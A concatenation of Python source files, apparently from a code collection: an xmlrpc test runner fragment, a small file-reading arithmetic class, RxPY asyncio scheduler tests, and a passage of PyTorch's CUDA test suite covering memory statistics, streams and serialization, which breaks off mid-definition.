# fails every time and so these tests are skipped on win32 platforms.
if sys.platform != 'win32':
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
SourceCode.py
|
from Base import BaseClass
import ast
from threading import Thread
import pickle
class SourceCode(BaseClass):
def add(self):
input_1 = open(self.get_file_path(), 'r').readline().strip()
input_2 = open(self.get_file_path_2(), 'r').readline().strip()
try:
input_1 = ast.literal_eval(input_1)
except:
pass
try:
input_2 = ast.literal_eval(input_2)
except:
pass
print(type(input_1))
result = input_1 + input_2
print(result)
def multiply(self):
input_1 = open(self.get_file_path(), 'r').readline().strip()
input_2 = open(self.get_file_path_2(), 'r').readline().strip()
try:
input_1 = ast.literal_eval(input_1)
except:
pass
try:
input_2 = ast.literal_eval(input_2)
except:
pass
if isinstance(input_2, int) and isinstance(input_1, int):
print(input_1 * input_2)
else:
print('Data Types not compatible or don\'t match')
def divide(self):
input_1 = open(self.get_file_path(), 'r').readline().strip()
input_2 = open(self.get_file_path_2(), 'r').readline().strip()
try:
input_1 = ast.literal_eval(input_1)
except:
pass
try:
input_2 = ast.literal_eval(input_2)
except:
pass
if isinstance(input_2, int) and isinstance(input_1, int):
print(input_1 // input_2)
obj = SourceCode()
thread_1 = Thread(target=obj.multiply)
thread_1.start()
thread_1.join()
with open('saved_objects.txt', 'wb') as objects:
pickle.dump(f'{thread_1.__dict__}', objects)
|
py3_asyncioscheduler.py
|
from nose import SkipTest
import rx
import asyncio
import threading
import unittest
from datetime import datetime, timedelta
from rx.concurrency import AsyncIOScheduler
class TestAsyncIOScheduler(unittest.TestCase):
def test_asyncio_schedule_now(self):
loop = asyncio.get_event_loop()
scheduler = AsyncIOScheduler(loop)
res = scheduler.now - datetime.now()
assert(res < timedelta(seconds=1))
def test_asyncio_schedule_action(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOScheduler(loop)
ran = False
def action(scheduler, state):
nonlocal ran
ran = True
scheduler.schedule(action)
yield from asyncio.sleep(0.1, loop=loop)
assert(ran is True)
loop.run_until_complete(go())
def test_asyncio_schedule_action_threadsafe(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOScheduler(loop, threadsafe=True)
ran = False
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
scheduler.schedule(action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.1, loop=loop)
assert(ran is True)
loop.run_until_complete(go())
def test_asyncio_schedule_action_due(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOScheduler(loop)
starttime = loop.time()
endtime = None
def action(scheduler, state):
nonlocal endtime
endtime = loop.time()
scheduler.schedule_relative(200, action)
yield from asyncio.sleep(0.3, loop=loop)
diff = endtime-starttime
assert(diff > 0.18)
loop.run_until_complete(go())
def test_asyncio_schedule_action_due_threadsafe(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOScheduler(loop, threadsafe=True)
starttime = loop.time()
endtime = None
def action(scheduler, state):
nonlocal endtime
endtime = loop.time()
def schedule():
scheduler.schedule_relative(200, action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.3, loop=loop)
diff = endtime-starttime
assert(diff > 0.18)
loop.run_until_complete(go())
def test_asyncio_schedule_action_cancel(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
ran = False
scheduler = AsyncIOScheduler(loop)
def action(scheduler, state):
nonlocal ran
ran = True
d = scheduler.schedule_relative(10, action)
d.dispose()
yield from asyncio.sleep(0.1, loop=loop)
assert(not ran)
loop.run_until_complete(go())
def test_asyncio_schedule_action_cancel_threadsafe(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
ran = False
scheduler = AsyncIOScheduler(loop, threadsafe=True)
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
d = scheduler.schedule_relative(10, action)
d.dispose()
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.1, loop=loop)
assert(not ran)
loop.run_until_complete(go())
|
test_cuda.py
|
# Owner(s): ["module: cuda"]
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY, \
get_cycles_per_ms
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_c >= last_c
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with a end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when try to allocate more than half memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes an 0.1 second spin to stream so if the copy is non blocking,
# stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cublas_allow_fp16_reduced_precision_reduction_get_set(self):
orig = torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = not orig
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), not orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
